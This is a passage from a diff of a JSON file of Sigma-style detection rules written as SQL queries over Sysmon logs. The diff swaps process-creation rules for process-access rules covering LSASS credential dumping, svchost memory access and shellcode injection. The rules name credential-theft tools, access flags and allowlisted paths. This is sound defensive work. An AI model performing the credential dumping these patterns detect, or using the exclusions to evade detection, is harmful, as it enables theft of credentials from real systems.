LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 
'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente'))" ], - "filename": "proc_creation_win_rundll32_sys.yml" + "filename": "proc_access_win_hack_sysmonente.yml" }, { - "title": "TA505 Dropper Load Pattern", - "id": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", + "title": "Malware Shellcode in Verclsid Target Process", + "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", "status": "test", - "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", + "author": "John Lambert (tech), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.g0092", - "attack.t1106" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'mshta.exe'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_ta505_dropper.yml" + "filename": "proc_access_win_malware_verclsid_shellcode.yml" }, { - "title": "Renamed Whoami Execution", - "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", - "status": "test", - "description": "Detects the execution of whoami that has been renamed to a 
different name to avoid detection", + "title": "Suspicious GrantedAccess Flags on LSASS Access", + "id": "a18dd26b-6450-46de-8c91-9659150cf088", + "status": "experimental", + "description": "Detects process access to LSASS memory with suspicious access flags", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Legitimate software such as AV and EDR" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'whoami.exe' AND NOT (Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program 
Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 
'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" ], - "filename": "proc_creation_win_renamed_whoami.yml" + "filename": "proc_access_win_susp_proc_access_lsass.yml" }, { - "title": "UAC Bypass via ICMLuaUtil", - "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "title": "Potential Svchost Memory Access", + "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", "status": "experimental", - "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", + "author": "Tim Burrell", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace 
LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_uac_bypass_icmluautil.yml" + "filename": "proc_access_win_invoke_phantom.yml" }, { - "title": "Suspicious Service Path Modification", - "id": "138d3531-8793-4f50-a2cd-f291b2863d78", - "status": "test", - "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", - "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "LSASS Memory Dump", + "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", + "status": "experimental", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Samir Bousseaden, Michael Haag", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unlikely" + "False positives are present when looking for 0x1410. Exclusions may be required." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" ], - 
"filename": "proc_creation_win_sc_service_path_modification.yml" + "filename": "proc_access_win_lsass_memdump.yml" }, { - "title": "Suspicious Splwow64 Without Params", - "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", - "status": "test", - "description": "Detects suspicious Splwow64.exe process without any command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "CMSTP Execution Process Access", + "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1218.003", + "attack.execution", + "attack.t1559.001", + "attack.g0069", + "attack.g0080", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%cmlua.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_splwow64_cli_anomaly.yml" + "filename": "proc_access_win_cmstp_execution_by_access.yml" }, { - "title": "SOURGUM Actor Behaviours", - "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", + "title": "SVCHOST Credential Dump", + "id": "174afcfa-6e40-4ae9-af64-496546389294", "status": "test", - "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", - "author": "MSTIC, FPT.EagleEye", + "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", + "author": "Florent Labouyrie", "tags": [ - "attack.t1546", - "attack.t1546.015", - "attack.persistence", - "attack.privilege_escalation" + "attack.t1548" 
], "falsepositives": [ - "Unknown" + "Non identified legit exectubale" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((Image LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR Image LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_sourgrum.yml" + "filename": "proc_access_win_svchost_cred_dump.yml" }, { - "title": "Exploiting SetupComplete.cmd CVE-2019-1378", - "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", - "status": "test", - "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Credential Dumping by LaZagne", + "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", + "status": "stable", + "description": "Detects LSASS process access by LaZagne for credential 
dumping.", + "author": "Bhabesh Raj, Jonhnathan Ribeiro", "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.execution", - "attack.t1059.003", - "attack.t1574", - "cve.2019.1378" + "attack.credential_access", + "attack.t1003.001", + "attack.s0349" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_exploit_cve_2019_1378.yml" + "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" }, { - "title": "Regasm/Regsvcs Suspicious Execution", - "id": "cc368ed0-2411-45dc-a222-510ace303cb2", + "title": "Potential Shellcode Injection", + "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", "status": "experimental", - "description": "Detects suspicious execution of Regasm/Regsvcs utilities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential shellcode injection used by tools 
such as Metasploit's migrate and Empire's psinject", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.t1218.009" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files 
(x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_regasm.yml" + "filename": "proc_access_win_shellcode_inject_msf_empire.yml" }, { - "title": "Suspect Svchost Activity", - "id": "16c37b52-b141-42a5-a3ea-bbe098444397", + "title": "LSASS Access from Program in Suspicious Folder", + "id": "fa34b441-961a-42fa-a100-ecc28c886725", "status": "experimental", - "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", - 
"author": "David Burkett, @signalblur", + "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" + "Updaters and installers are typical false positives. Apply custom filters depending on your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE 
'\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE 
